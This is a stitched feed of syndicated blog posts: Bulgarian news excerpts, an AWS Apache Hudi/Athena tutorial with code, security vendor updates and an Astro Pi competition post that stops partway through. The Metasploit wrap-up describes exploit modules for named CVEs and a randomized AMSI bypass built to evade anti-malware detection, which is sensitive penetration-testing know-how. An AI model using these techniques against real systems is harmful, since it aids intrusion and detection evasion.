Единствени в ЕС българските лидери не са обявили дали са ваксинирани срещу COVID-19

Post Syndicated from Иван Радев original https://toest.bg/bg-leaders-vaccine-covid-19/

За шест месеца – от декември 2020 г. до юни 2021 г. – лидерите на всички страни от Европейския съюз обявиха, че са се ваксинирали срещу COVID-19. На всички без една. България. За разлика от европейските си колеги, президентът Румен Радев още не се е решил да предприеме тази стъпка. Поне не публично. Същото важи и за бившия министър-председател Бойко Борисов, както и за служебния премиер Стефан…

Източник

Как се учим на медийна грамотност

Post Syndicated from Йоанна Елми original https://toest.bg/kak-se-uchim-na-mediyna-gramotnost/

„Училище на ХХI век“ е съвместна рубрика на „Тоест“ и „Заедно в час“, в която ще ви представим успешните практики в българското образование и ще търсим работещи решения за неговото подобряване. Един от най-големите проблеми на учениците е, че не умеят да различават факт от мнение, споделя Сава Ташев, учител в столичното 97-мо СУ „Братя Миладинови“. Той преподава медийна грамотност „през предмета…

Източник

Крещим на света, че имаме нужда от помощ

Post Syndicated from original https://toest.bg/kreshtim-na-sveta-che-imame-nuzhda-ot-pomosht/

Вторник, 13 юли 2021 г. – Здравей! Пиша ти от тайна WiFi мрежа. – Защо тайна? – Прекъснаха ни интернета. Никой няма връзка през мобилни данни на телефона, защото не искат да се публикува това, което в момента се случва. Това е моят вик по улиците на Хавана от днес. – Това ти ли си в аудиото? – Да. Не можем да издържаме повече. Убиват ни от глад. Аз повече не мога така.

Източник

На второ четене: „Празнината“ от Катерина Върмет

Post Syndicated from Стефан Иванов original https://toest.bg/na-vtoro-chetene-prazninata/

Никой от нас не чете единствено най-новите книги. Тогава защо само за тях се пише? „На второ четене“ е рубрика, в която отваряме списъците с книги, публикувани преди поне година, четем ги и препоръчваме любимите си от тях. Рубриката е част от партньорската програма Читателски клуб „Тоест“. Изборът на заглавия обаче е единствено на авторите – Стефан Иванов и Севда Семер, които биха ви препоръчали…

Източник

Седмицата в „Тоест“ (12–16 юли)

Post Syndicated from Тоест original https://toest.bg/editorial-12-16-july-2021/

И вторите парламентарни избори за 2021 г. са вече история. Вероятността до края на годината да ни се наложи отново да гласуваме за парламент не може да се изключи напълно, предвид събитията от седмицата. В „Има такъв народ“ очевидно не осъзнават, че макар формално да спечелиха изборите, победата им е пирова и не могат да си позволят комфорта еднолично да определят посоката. Или просто не желаят да…

Източник

Query an Apache Hudi dataset in an Amazon S3 data lake with Amazon Athena part 1: Read-optimized queries

Post Syndicated from Dhiraj Thakur original https://aws.amazon.com/blogs/big-data/part-1-query-an-apache-hudi-dataset-in-an-amazon-s3-data-lake-with-amazon-athena-part-1-read-optimized-queries/

On July 16, 2021, Amazon Athena upgraded its Apache Hudi integration with new features and support for Hudi’s latest 0.8.0 release. Hudi is an open-source storage management framework that provides incremental data processing primitives for Hadoop-compatible data lakes. This upgraded integration adds the latest community improvements to Hudi along with important new features including snapshot queries, which provide near real-time views of table data, and reading bootstrapped tables which provide efficient migration of existing table data.

In this series of posts on Athena and Hudi, we will provide a short overview of key Hudi capabilities along with detailed procedures for using read-optimized queries, snapshot queries, and bootstrapped tables.

Overview

With Apache Hudi, you can perform record-level inserts, updates, and deletes on Amazon S3, allowing you to comply with data privacy laws, consume real-time streams and change data captures, reinstate late-arriving data, and track history and rollbacks in an open, vendor neutral format. Apache Hudi uses Apache Parquet and Apache Avro storage formats for data storage, and includes built-in integrations with Apache Spark, Apache Hive, and Apache Presto, which enables you to query Apache Hudi datasets using the same tools that you use today with near-real-time access to fresh data.

An Apache Hudi dataset can be one of the following table types:

  • Copy on Write (CoW) – Data is stored in columnar format (Parquet), and each update creates a new version of the base file on a write commit. A CoW table type typically lends itself to read-heavy workloads on data that changes less frequently.
  • Merge on Read (MoR) – Data is stored using a combination of columnar (Parquet) and row-based (Avro) formats. Updates are logged to row-based delta files and are compacted as needed to create new versions of the columnar files. A MoR table type is typically suited for write-heavy or change-heavy workloads with fewer reads.

Apache Hudi provides three logical views for accessing data:

  • Read-optimized – Provides the latest committed dataset from CoW tables and the latest compacted dataset from MoR tables
  • Incremental – Provides a change stream between two actions out of a CoW dataset to feed downstream jobs and extract, transform, load (ETL) workflows
  • Real-time – Provides the latest committed data from a MoR table by merging the columnar and row-based files inline

As of this writing, Athena supports read-optimized and real-time views.

Using read-optimized queries

In this post, you will use Athena to query an Apache Hudi read-optimized view on data residing in Amazon S3. The walkthrough includes the following high-level steps:

  1. Store raw data in an S3 data lake.
  2. Transform the raw data to Apache Hudi CoW and MoR tables using Apache Spark on Amazon EMR.
  3. Query and analyze the tables on Amazon S3 with Athena on a read-optimized view.
  4. Perform an update to a row in the Apache Hudi dataset.
  5. Query and analyze the updated dataset using Athena.

Architecture

The following diagram illustrates our solution architecture.

In this architecture, you have high-velocity weather data stored in an S3 data lake. This raw dataset is processed on Amazon EMR and stored in an Apache Hudi dataset in Amazon S3 for further analysis by Athena. If the data is updated, Apache Hudi performs an update on the existing record, and these updates are reflected in the results fetched by the Athena query.

Let’s build this architecture.

Prerequisites

Before getting started, we set up our resources. For this post, we use the us-east-1 Region.

  1. Create an Amazon Elastic Compute Cloud (Amazon EC2) key pair. For instructions, see Create a key pair using Amazon EC2.
  2. Create a S3 bucket for storing the raw weather data (for this post, we call it weather-raw-bucket).
  3. Create two folders in the S3 bucket: parquet_file and delta_parquet.
  4. Download all the data files, Apache Scala scripts (data_insertion_cow_delta_script, data_insertion_cow_script, data_insertion_mor_delta_script, and data_insertion_mor_script), and Athena DDL code (athena_weather_hudi_cow.sql and athena_weather_hudi_mor.sql) from the GitHub repo.
  5. Upload the weather_oct_2020.parquet file to weather-raw-bucket/parquet_file.
  6. Upload the file weather_delta.parquet to weather-raw-bucket/delta_parquet. We update an existing weather record from a relative_humidity of 81 to 50 and a temperature of 6.4 to 10.
  7. Create another S3 bucket for storing the Apache Hudi dataset. For this post, we create a bucket with a corresponding subfolder named athena-hudi-bucket/hudi_weather.
  8. Deploy the EMR cluster using the provided AWS CloudFormation template:
  9. Enter a name for your stack.
  10. Choose a pre-created key pair name.

This is required to connect to the EMR cluster nodes. For more information, see Connect to the Master Node Using SSH.

  1. Accept all the defaults and choose Next.
  2. Acknowledge that AWS CloudFormation might create AWS Identity and Access Management (IAM) resources.
  3. Choose Create stack.

Use Apache Hudi with Amazon EMR

When the cluster is ready, you can use the provided key pair to SSH into the primary node.

  1. Use the following bash command to load the spark-shell to work with Apache Hudi:
    spark-shell --conf "spark.serializer=org.apache.spark.serializer.KryoSerializer" --conf "spark.sql.hive.convertMetastoreParquet=false" --jars /usr/lib/hudi/hudi-spark-bundle.jar,/usr/lib/spark/external/lib/spark-avro.jar

  2. On the spark-shell, run the following Scala code in the script data_insertion_cow_script to import weather data from the S3 data lake to an Apache Hudi dataset using the CoW storage type:
    import org.apache.spark.sql.SaveMode
    import org.apache.spark.sql.functions._
    import org.apache.hudi.DataSourceWriteOptions
    import org.apache.hudi.config.HoodieWriteConfig
    import org.apache.hudi.hive.MultiPartKeysValueExtractor
    
    //Set up various input values as variables
    val inputDataPath = "s3://weather-raw-bucket/parquet_file/"
    val hudiTableName = "weather_hudi_cow"
    val hudiTablePath = "s3://athena-hudi-bucket/hudi_weather/" + hudiTableName
    
    // Set up our Hudi Data Source Options
    val hudiOptions = Map[String,String](
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "city_id",
    	DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "timestamp",
        DataSourceWriteOptions.PARTITIONPATH_FIELD_OPT_KEY -> "date", 
        HoodieWriteConfig.TABLE_NAME -> hudiTableName, 
        DataSourceWriteOptions.OPERATION_OPT_KEY ->
            DataSourceWriteOptions.INSERT_OPERATION_OPT_VAL, 
        DataSourceWriteOptions.PRECOMBINE_FIELD_OPT_KEY -> "timestamp", 
        DataSourceWriteOptions.HIVE_SYNC_ENABLED_OPT_KEY -> "true", 
        DataSourceWriteOptions.HIVE_TABLE_OPT_KEY -> hudiTableName, 
        DataSourceWriteOptions.HIVE_PARTITION_FIELDS_OPT_KEY -> "date", 
        DataSourceWriteOptions.HIVE_PARTITION_EXTRACTOR_CLASS_OPT_KEY ->
            classOf[MultiPartKeysValueExtractor].getName)
    
    // Read data from S3 and create a DataFrame with Partition and Record Key
    val inputDF = spark.read.format("parquet").load(inputDataPath)
    
    // Write data into the Hudi dataset
    inputDF.write.format("org.apache.hudi").options(hudiOptions).mode(SaveMode.Append).save(hudiTablePath)

Replace the S3 bucket path for inputDataPath and hudiTablePath in the preceding code with your S3 bucket.

For more information about DataSourceWriteOptions, see Work with a Hudi Dataset.

  1. In the spark-shell, count the total number of records in the Apache Hudi dataset:
    scala> inputDF.count()
    res1: Long = 1000

  2. Repeat the same step for creating an MoR table using data_insertion_mor_script (the default is COPY_ON_WRITE).
  3. Run the spark.sql("show tables").show(); query to list three tables, one for CoW and two queries, _rt and _ro, for MoR.

The following screenshot shows our output.

Let’s check the processed Apache Hudi dataset in the S3 data lake.

  1. On the Amazon S3 console, confirm the subfolders weather_hudi_cow and weather_hudi_mor are in athena-hudi-bucket.
  1. Navigate to the weather_hudi_cow subfolder to see the Apache Hudi dataset that is partitioned using the date key—one for each date in our dataset.
  2. On the Athena console, create a hudi_athena_test database using following command:
    create database hudi_athena_test;

You use this database to create all your tables.

  1. Create an Athena table using the athena_weather_hudi_cow.sql script:
    CREATE EXTERNAL TABLE weather_partition_cow(
      `_hoodie_commit_time` string,
      `_hoodie_commit_seqno` string,
      `_hoodie_record_key` string,
      `_hoodie_partition_path` string,
      `_hoodie_file_name` string,
      `city_id` string,
      `timestamp` string,
      `relative_humidity` decimal(3,1),
      `temperature` decimal(3,1),
      `absolute_humidity` decimal(5,4)
      )
      PARTITIONED BY ( 
      `date` string)
    ROW FORMAT SERDE
      'org.apache.hadoop.hive.ql.io.parquet.serde.ParquetHiveSerDe'
    STORED AS INPUTFORMAT
      'org.apache.hudi.hadoop.HoodieParquetInputFormat'
    OUTPUTFORMAT
      'org.apache.hadoop.hive.ql.io.parquet.MapredParquetOutputFormat'
    LOCATION
      's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow'
    

Replace the S3 bucket path in the preceding code with your S3 bucket (Hudi table path) in LOCATION.

  1. Add partitions to the table by running the following query from the athena_weather_judi_cow.sql script on the Athena console:
    ALTER TABLE weather_partition_cow ADD
    PARTITION (date = '2020-10-01') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-01/'
    PARTITION (date = '2020-10-02') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-02/'
    PARTITION (date = '2020-10-03') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-03/'
    PARTITION (date = '2020-10-04') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-04/';

Replace the S3 bucket path in the preceding code with your S3 bucket (Hudi table path) in LOCATION.

  1. Confirm the total number of records in the Apache Hudi dataset with the following query:
    SELECT count(*) FROM "hudi_athena_test"."weather_partition_cow";

It should return a single row with a count of 1,000.

Now let’s check the record that we want to update.

  1. Run the following query on the Athena console:
    SELECT * FROM "hudi_athena_test"."weather_partition_cow"
    where city_id ='1'
    and date ='2020-10-04'
    and timestamp = '2020-10-04T07:19:12Z';

The output should look like the following screenshot. Note the value of relative_humidity and temperature.

  1. Return to the Amazon EMR primary node and run the following code in the data_insertion_cow_delta_script script on the spark-shell prompt to update the data:
    import org.apache.spark.sql.SaveMode
    import org.apache.spark.sql.functions._
    import org.apache.hudi.DataSourceWriteOptions
    import org.apache.hudi.config.HoodieWriteConfig
    import org.apache.hudi.hive.MultiPartKeysValueExtractor
    
    //Set up various input values as variables
    val inputDataPath = "s3://weather-raw-bucket/delta_parquet/"
    val hudiTableName = "weather_hudi_cow"
    val hudiTablePath = "s3://athena-hudi-bucket/hudi_weather/" + hudiTableName
    
    // Set up our Hudi Data Source Options
    val hudiOptions = Map[String,String](
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "city_id",
    	DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "timestamp",
        DataSourceWriteOptions.PARTITIONPATH_FIELD_OPT_KEY -> "date", 
        HoodieWriteConfig.TABLE_NAME -> hudiTableName, 
        DataSourceWriteOptions.OPERATION_OPT_KEY ->
            DataSourceWriteOptions.INSERT_OPERATION_OPT_VAL, 
        DataSourceWriteOptions.PRECOMBINE_FIELD_OPT_KEY -> "timestamp", 
        DataSourceWriteOptions.HIVE_SYNC_ENABLED_OPT_KEY -> "true", 
        DataSourceWriteOptions.HIVE_TABLE_OPT_KEY -> hudiTableName, 
        DataSourceWriteOptions.HIVE_PARTITION_FIELDS_OPT_KEY -> "date", 
        DataSourceWriteOptions.HIVE_PARTITION_EXTRACTOR_CLASS_OPT_KEY ->
            classOf[MultiPartKeysValueExtractor].getName)
    
    // Read data from S3 and create a DataFrame with Partition and Record Key
    val inputDF = spark.read.format("parquet").load(inputDataPath)
    
    // Write data into the Hudi dataset
    inputDF.write.format("org.apache.hudi").options(hudiOptions).mode(SaveMode.Append).save(hudiTablePath)
    

Replace the S3 bucket path for inputDataPath and hudiTablePath in the preceding code with your S3 bucket.

  1. Run the following query on the Athena console to confirm no change occurred to the total number of records:
SELECT count(*) FROM "hudi_athena_test"."weather_partition_cow";

The following screenshot shows our query results.

  1. Run the following query again on the Athena console to check for the update:
SELECT * FROM "hudi_athena_test"."weather_partition_cow"
where city_id ='1'
and date ='2020-10-04'
and timestamp = '2020-10-04T07:19:12Z'

The relative_humidity and temperature values for the relevant record are updated.

  1. Repeat similar steps for the MoR table.

Clean up the resources

You must clean up the resources you created earlier to avoid ongoing charges.

  1. On the AWS CloudFormation console, delete the stack you launched.
  2. On the Amazon S3 console, empty the buckets weather-raw-bucket and athena-hudi-bucket and delete the buckets.

Conclusion

As you have learned in this post, we used Apache Hudi support in Amazon EMR to develop a data pipeline to simplify incremental data management use cases that require record-level insert and update operations. We used Athena to read the read-optimized view of an Apache Hudi dataset in an S3 data lake.


About the Authors

Dhiraj Thakur is a Solutions Architect with Amazon Web Services. He works with AWS customers and partners to provide guidance on enterprise cloud adoption, migration and strategy. He is passionate about technology and enjoys building and experimenting in Analytics and AI/ML space.

 

 

 

Sameer Goel is a Solutions Architect in The Netherlands, who drives customer success by building prototypes on cutting-edge initiatives. Prior to joining AWS, Sameer graduated with a master’s degree from NEU Boston, with a Data Science concentration. He enjoys building and experimenting with creative projects and applications.

 

 

Imtiaz (Taz) Sayed is the WW Tech Master for Analytics at AWS. He enjoys engaging with the community on all things data and analytics.

 

REvil is Off-Line

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/07/revil-is-off-line.html

This is an interesting development:

Just days after President Biden demanded that President Vladimir V. Putin of Russia shut down ransomware groups attacking American targets, the most aggressive of the groups suddenly went off-line early Tuesday.

[…]

Gone was the publicly available “happy blog” the group maintained, listing some of its victims and the group’s earnings from its digital extortion schemes. Internet security groups said the custom-made sites ­- think of them as virtual conference rooms — where victims negotiated with REvil over how much ransom they would pay to get their data unlocked also disappeared. So did the infrastructure for making payments.

Okay. So either the US took them down, Russia took them down, or they took themselves down.

What’s New in InsightVM: Q2 2021 in Review

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/16/insightvm-release-roundup-q2-2021/

What’s New in InsightVM: Q2 2021 in Review

The world is changing rapidly. We hear that phrase a lot. Throughout Q2 though, it really is true. Vaccines have been rolling out, to varying success depending on the part of the world, but there is optimism.    

As Rapid7 offices begin to open up to our hard-working team members around the globe, we want to infuse some of that optimism into the latest and greatest new features and updates now available to InsightVM customers. The back half of the year will no doubt bring new threats (will ransomware attacks keep going bigger?), so let’s dive into what’s new so you can prepare and prosper.

Honorable mention

In our Q1 recap, we covered 2 releases that can each have significant positive impact on your operations, so they bear repeating here.

Kubernetes integration

Now available in InsightVM, you can now navigate directly to the new Kubernetes tab to initiate the Kubernetes monitor in DockerHub. Then, deploy it to your clusters to see data in Container VRM within InsightVM. You can also see monitor health and connection details via the Data Collection Management page.  

Scoped Executive Summary Report

The Executive Summary Report in InsightVM has expanded its functionality so users can filter the report for at-a-glance views of priority items. Shape the report to access key metrics and communicate progress to desired goals and outcomes.

Dashboards, consoles, and panels, oh my!

The new releases and updates for the second quarter of 2021 were aimed at quick-look features that bolster our goal of providing customers with evolving ease-of-use functionalities and products that increasingly focus on at-a-glance convenience.

What’s new: Dialing up dashboard performance

Featuring new cards as well as new ways to filter cards, these features solve 3 distinct issues:

Gaining insights into Microsoft’s vulnerability patch cycle

Rapid7’s Patch Tuesday dashboard template now provides an easy way to stay up to date on information associated with deployment of new Microsoft patches and cycles. Why search around for news or insights when you can get them in the one-stop-shop where your team already receives updates and kicks off remediation efforts on the latest vulnerabilities?

Featuring new cards detailing the assets affected as well as trends, assessments, and biggest risks, you can now learn about and prioritize remediation efforts on all Microsoft vulnerabilities within this expanded InsightVM dashboard.  

Hunting down fine-grained vulnerability-and-remediation details

  • New card #1: New vs remediated vulnerability comparison over time
    • Displays trends in remediated vulnerability findings for date ranges you specify.
  • New card #2: Average days to remediate by severity
    • Compares the average number of days needed to remediate a specific vulnerability against all vulnerabilities remediated for a week you specify.
  • New card #3: Number of unique vulnerabilities
    • Expandable table shows the number of all unique vulnerabilities in the Rapid7 database for which InsightVM has checks as well as the number of all unique vulnerabilities in the user’s environment.
  • New card #4: Asset type
    • Bar chart displays device type for assets in the scope you filter. Each bar shows the quantity of a group of os.type, sorted from left to right.

Filtering every card in a dashboard to focus the view on a group of assets or issues

If this were about finding the best way to navigate your way past a big city, we would say this new feature is the loop that takes you around the traffic vs taking the surface streets that often put you in the traffic.

You can now quickly filter all of your cards by applying a single query to your dashboard. Gone are the days of manually filtering each and every card just to focus your view on a group of assets or vulnerabilities. Long story short: You save more time by quickly filtering to your desired view.  

What’s improved: Shortcuts to what you need

To continue the traffic analogy, getting somewhere faster than you’re used to is always a great thing. The latest InsightVM improvements help you do just that by addressing 3 issues:

Manually loading custom vulnerability checks

Now you can simply deploy a check, load it into the Security Console, then the console does the rest. Just load the check, start the scan, and the console will automatically push that check to whichever Scan Engine(s) you specify.

More context needed

Peek. Panel. Proof. What that actually means is InsightVM now offers at-a-glance context about a specific vulnerability via a “peek panel.” When a user clicks on an affected asset from the vulnerability details page, the panel opens to the right and displays the proof details.  

Gaining results visibility

Teams assessing container image builds in their CI/CD pipeline can now see results in the InsightVM Container Security feature Builds tab.

We hope you have a successful quarter and a great season, wherever your business takes you. Until next time…    

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/

Eternal Blue improvements

Metasploit Wrap-Up

Prior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate ms17_010_eternalblue_win8 Python module would target Windows 8 and above.

Now Metasploit provides a single Ruby exploit module exploits/windows/smb/ms17_010_eternalblue.rb which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.

AmSi 0BfuSc@t!on

The Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such technique is integrated directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as amsiInitFailed as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting Powershell::prepend_protections_bypass to false.

VMware vCenter Server RCE

Our very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the module documentation.

New module content (4)

  • VMware vCenter Server Virtual SAN Health Check Plugin RCE by wvu and Ricter Z, which exploits CVE-2021-21985 – A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user.
  • Polkit D-Bus Authentication Bypass by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits CVE-2021-3560 – A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with root permissions, which can then be used to gain a shell as root. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.
  • ForgeRock / OpenAM Jato Java Deserialization by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits CVE-2021-35464 – A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability
    in OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.
  • Windows Process Memory Dump by smashery – This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.

Enhancements and features

  • #15217 from agalway-r7 – Removes the Python module ms17_010_eternalblue_win8.py and consolidates the functionality into exploits/windows/smb/ms17_010_eternalblue.rb – which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.
  • #15254 from zeroSteiner – This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.

Bugs fixed

  • #15362 from bwatters-r7 – Fixes a regression issue with post/multi/manage/shell_to_meterpreter, and other interactions with command shell based sessions
  • #15420 from adfoster-r7 – Fixes an regression issue were auxiliary/scanner/ssh/eaton_xpert_backdoor failed to load correctly

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Using Amazon Macie to Validate S3 Bucket Data Classification

Post Syndicated from Bill Magee original https://aws.amazon.com/blogs/architecture/using-amazon-macie-to-validate-s3-bucket-data-classification/

Securing sensitive information is a high priority for organizations for many reasons. At the same time, organizations are looking for ways to empower development teams to stay agile and innovative. Centralized security teams strive to create systems that align to the needs of the development teams, rather than mandating how those teams must operate.

Security teams who create automation for the discovery of sensitive data have some issues to consider. If development teams are able to self-provision data storage, how does the security team protect that data? If teams have a business need to store sensitive data, they must consider how, where, and with what safeguards that data is stored.

Let’s look at how we can set up Amazon Macie to validate data classifications provided by decentralized software development teams. Macie is a fully managed service that uses machine learning (ML) to discover sensitive data in AWS. If you are not familiar with Macie, read New – Enhanced Amazon Macie Now Available with Substantially Reduced Pricing.

Data classification is part of the security pillar of a Well-Architected application. Following the guidelines provided in the AWS Well-Architected Framework, we can develop a resource-tagging scheme that fits our needs.

Overview of decentralized data validation system

In our example, we have multiple levels of data classification that represent different levels of risk associated with each classification. When a software development team creates a new Amazon Simple Storage Service (S3) bucket, they are responsible for labeling that bucket with a tag. This tag represents the classification of data stored in that bucket. The security team must maintain a system to validate that the data in those buckets meets the classification specified by the development teams.

This separation of roles and responsibilities for development and security teams who work independently requires a validation system that’s decoupled from S3 bucket creation. It should automatically detect new buckets or data in the existing buckets, and validate the data against the assigned classification tags. It should also notify the appropriate development teams of misclassified or unclassified buckets in a timely manner. These notifications can be through standard notification channels, such as email or Slack channel notifications.

Validation and alerts with AWS services

Figure 1. Validation system for Data Classification

Figure 1. Validation system for data classification

We assume that teams are permitted to create S3 buckets and we will use AWS Config to enforce the following required tags: DataClassification and SupportSNSTopic. The DataClassification tag indicates what type of data is allowed in the bucket. The SupportSNSTopic tag indicates an Amazon Simple Notification Service (SNS) topic. If there are issues found with the data in the bucket, a message is published to the topic, and Amazon SNS will deliver an alert. For example, if there is personally identifiable information (PII) data in a bucket that is classified as non-sensitive, the system will alert the owners of the bucket.

Macie is configured to scan all S3 buckets on a scheduled basis. This configuration ensures that any new bucket and data placed in the buckets is analyzed the next time the Macie job runs.

Macie provides several managed data identifiers for discovering and classifying the data. These include bank account numbers, credit card information, authentication credentials, PII, and more. You can also create custom identifiers (or rules) to gather information not covered by the managed identifiers.

Macie integrates with Amazon EventBridge to allow us to capture data classification events and route them to one or more destinations for reporting and alerting needs. In our configuration, the event initiates an AWS Lambda. The Lambda function is used to validate the data classification inferred by Macie against the classification specified in the DataClassification tag using custom business logic. If a data classification violation is found, the Lambda then sends a message to the Amazon SNS topic specified in the SupportSNSTopic tag.

The Lambda function also creates custom metrics and sends those to Amazon CloudWatch. The metrics are organized by engineering team and severity. This allows the security team to create a dashboard of metrics based on the Macie findings. The findings can also be filtered per engineering team and severity to determine which teams need to be contacted to ensure remediation.

Conclusion

This solution provides a centralized security team with the tools it needs. The team can validate the data classification of an Amazon S3 bucket that is self-provisioned by a development team. New Amazon S3 buckets are automatically included in the Macie jobs and alerts. These are only sent out if the data in the bucket does not conform to the classification specified by the development team. The data auditing process is loosely coupled with the Amazon S3 Bucket creation process, enabling self-service capabilities for development teams, while ensuring proper data classification. Your teams can stay agile and innovative, while maintaining a strong security posture.

Learn more about Amazon Macie and Data Classification.

OSPAR 2021 report now available with 127 services in scope

Post Syndicated from Clara Lim original https://aws.amazon.com/blogs/security/ospar-2021-report-now-available-with-127-services-in-scope/

We are excited to announce the completion of the third Outsourced Service Provider Audit Report (OSPAR) audit cycle on July 1, 2021. The latest OSPAR certification includes the addition of 19 new services in scope, bringing the total number of services to 127 in the Asia Pacific (Singapore) Region.

You can download our latest OSPAR report in AWS Artifact, a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact. The list of services in scope for OSPAR is available in the report, and is also available on the AWS Services in Scope by Compliance Program webpage.

Some of the newly added services in scope include the following:

  • AWS Outposts, a fully managed service that extends AWS infrastructure, AWS services, APIs, and tools to any datacenter, co-location space, or an on-premises facility for a consistent hybrid experience.
  • Amazon Connect, an easy to use omnichannel cloud contact center that helps customers provide superior customer service across voice, chat, and tasks at lower cost than traditional contact center systems.
  • Amazon Lex, a service for building conversational interfaces into any application using voice and text.
  • Amazon Macie, a fully managed data security and data privacy service that uses machine learning and pattern matching to help customers discover, monitor, and protect customers’ sensitive data in AWS.
  • Amazon Quantum Ledger Database (QLDB), a fully managed ledger database that provides a transparent, immutable and cryptographically verifiable transaction log owned by a central trusted authority.

The OSPAR assessment is performed by an independent third-party auditor, selected from the ABS list of approved auditors. The assessment demonstrates that AWS has a system of controls in place that meet the Association of Banks in Singapore (ABS) Guidelines on Control Objectives and Procedures for Outsourced Service Providers. Our alignment with the ABS guidelines demonstrates to customers, our commitment to meet the security expectations for cloud service providers set by the financial services industry in Singapore. You can leverage the OSPAR assessment report to conduct due diligence, and to help reduce the effort and costs required for compliance. AWS OSPAR reporting period is now updated in the ABS list of OSPAR Audited Outsourced Service Providers.

As always, we are committed to bringing new services into the scope of our OSPAR program based on your architectural and regulatory needs. Please reach out to your AWS account team if you have questions about the OSPAR report.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Clara Lim

Clara is the Audit Program Manager for the Asia Pacific Region, leading multiple security certification programs. Clara is passionate about leveraging her decade-long experience to deliver compliance programs that provide assurance and build trust with customers.

Amazing science from the winners of Astro Pi Mission Space Lab 2020/21

Post Syndicated from Claire Given original https://www.raspberrypi.org/blog/winners-astro-pi-mission-space-lab-20-21/

The Raspberry Pi Foundation and ESA Education are excited to announce the winners and highly commended Mission Space Lab teams of the 2020/21 European Astro Pi Challenge!

ESA Astronaut Thomas Pesquet with the Astro Pi computers aboard the International Space Station
ESA Astronaut Thomas Pesquet floating aboard the International Space Station with the two Astro Pi computers

In Mission Space Lab, teams of young people aged up to 19 create scientific experiments that run on the International Space Station’s two Astro Pi computers — space-hardened Raspberry Pis with cameras and an array of sensors.

In the final phase of Mission Space Lab, teams analyse the data captured during their experiment’s three-hour runtime on the ISS and write a short report describing their experiment’s hypothesis, methods, results, and conclusions.

The Maldives shown from space by an Astro Pi computer on the International Space Station
The Maldives as captured by the Mechabot team

You can read the best reports below! From 154 final reports, the Astro Pi team has now chosen 10 winners and 5 highly commended teams that have each demonstrated great scientific merit and innovative use of the Astro Pi hardware.

Our winning teams are…

Zeus from Tudor Vianu National College of Computer Science in Romania, who used photos of Earth captured by the Astro Pi’s camera, historical data sets, and machine learning to develop a weather forecast system that predicts meteorological phenomena on Earth.

Mag-AZ from Escola Secundária Domingos Rebelo in Portugal, who attempted to create an algorithm that could calculate the location of the magnetic poles of any planet or star by using the Astro Pi’s sensors to map Earth’s magnetic fields.

Lake Balkhash in Kazakhstan shown from space by an Astro Pi computer on the International Space Station
Lake Balkhash in Kazakhstan as captured by the Jupiter team

Atlantes from Niubit Coding Club in Spain, who used a sonification process to convert data captured by the Astro Pi’s sensors into music, inspired by Commander Chris Hadfield’s performance of Space Oddity on the ISS in 2013. You can see more about their experiment here.

Mateii from Saint Sava National College in Romania, who investigated the potential growth of Aspergillus and Penicillium mold on the ISS in comparison to on Earth using a simulation model and Astro Pi sensor readings taken inside the Columbus module.

The River Nile in Egypt seen by an Astro Pi computer on the International Space Station
The river Nile in Egypt as captured by the Mechabot team

